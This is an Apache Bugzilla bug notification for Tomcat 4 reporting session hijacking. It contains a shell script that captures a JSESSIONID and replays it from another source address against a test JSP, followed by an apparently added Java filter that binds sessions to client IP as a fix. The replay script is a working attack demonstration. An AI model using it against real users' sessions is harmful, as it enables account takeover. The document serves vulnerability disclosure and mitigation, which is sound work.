DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12904>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND INSERTED IN THE BUG DATABASE.
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12904

Session hijacking - see script's comment

Summary: Session hijacking - see script's comment
Product: Tomcat 4
Version: 4.0.2 Final
Platform: Other
OS/Version: Linux
Status: UNCONFIRMED
Severity: Major
Priority: Other
Component: Unknown
AssignedTo: [EMAIL PROTECTED]
ReportedBy: [EMAIL PROTECTED]

#!/bin/sh
#
# Demonstrate a session hijacking against a Jakarta/Tomcat 4.0.3 JSP page.
#
# Objective: intrusion in a user-established http session context
# from another IP through JSESSIONID interception and reuse.
#
# Test against:
# - a JSP page which increments a session-counter
#
# How:
# - Execute an HTTP call from an IP address
# - Obtain a JSESSION ID
# - Execute another HTTP call from another IP address reusing the JSESSION ID
#
# Result:
# - The per-user session counter has a double increment
#
# Defacement:
# - The second HTTP request WOULD BE REJECTED due to an unadmissible
#   source IP/JSESSION ID couple
#
# Test environment:
# Linux Mandrake 8.1
# JVM 1.3.1
# Tomcat 4.0.2
#
#
# a page which returns an auto-incremental number (1 counter per session)
URL=http://k900:8080/autosc3000/app/jsp/Mytest2.jsp
cookie="x"
i=0
while : ; do
    # alternate the source address on every request
    m=$((i % 2))
    if [ "$m" = "1" ]; then
        address=k900
    else
        address=localhost
    fi
    # HTTP request to tomcat; --save-headers keeps the Set-Cookie line in x
    wget --header="Cookie: $cookie" --save-headers --bind-address="$address" -O x "$URL" \
        > /dev/null 2>/dev/null
    printf '%s ' "$address"
    cat x | grep Mytest -A 1 | tail -1
    # capture the JSESSIONID from the first response and reuse it afterwards
    if [ "$cookie" = "x" ]; then
        cookie="`cat x | grep Set-Cookie | tr -d '\r' | tr ";" " " | awk '{print $2}'`"
    fi
    i=$((i + 1))
    sleep 1
done
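One way to produce the rejection the report asks for, as an added example that is not part of the bug report or of Tomcat: a Servlet 2.3 filter (the API level Tomcat 4 implements) that binds each session to the client address it was created from and refuses the same JSESSIONID arriving from a different address. The class name and the session attribute key are made up.

```java
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/**
 * Ties every session to the client address seen when the session was
 * created. A later request that presents the same JSESSIONID from a
 * different address (the script's k900/localhost alternation) has its
 * session invalidated and is answered with 403.
 */
public class SessionAddressBindingFilter implements Filter {
    // Hypothetical attribute name; any key the application does not use works.
    static final String BOUND_ADDR = "example.boundRemoteAddr";

    public void init(FilterConfig cfg) {}
    public void destroy() {}

    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        String client = request.getRemoteAddr();
        // getSession(false) never creates a session, so a bogus or expired
        // JSESSIONID simply yields null here and is handled downstream.
        HttpSession session = request.getSession(false);
        if (session != null) {
            String bound = (String) session.getAttribute(BOUND_ADDR);
            if (bound != null && !bound.equals(client)) {
                // Same session ID, different source: reject and kill the session.
                session.invalidate();
                ((HttpServletResponse) res).sendError(HttpServletResponse.SC_FORBIDDEN);
                return;
            }
        }
        chain.doFilter(req, res);
        // The JSP may have created the session during this request; bind it
        // now so the very next request from elsewhere is already rejected.
        HttpSession current = request.getSession(false);
        if (current != null && current.getAttribute(BOUND_ADDR) == null) {
            current.setAttribute(BOUND_ADDR, client);
        }
    }
}
```

Register it in web.xml with a filter-mapping on /*. Clients behind NAT share one address and roaming clients change theirs, so address binding trades some availability for the rejection the report describes.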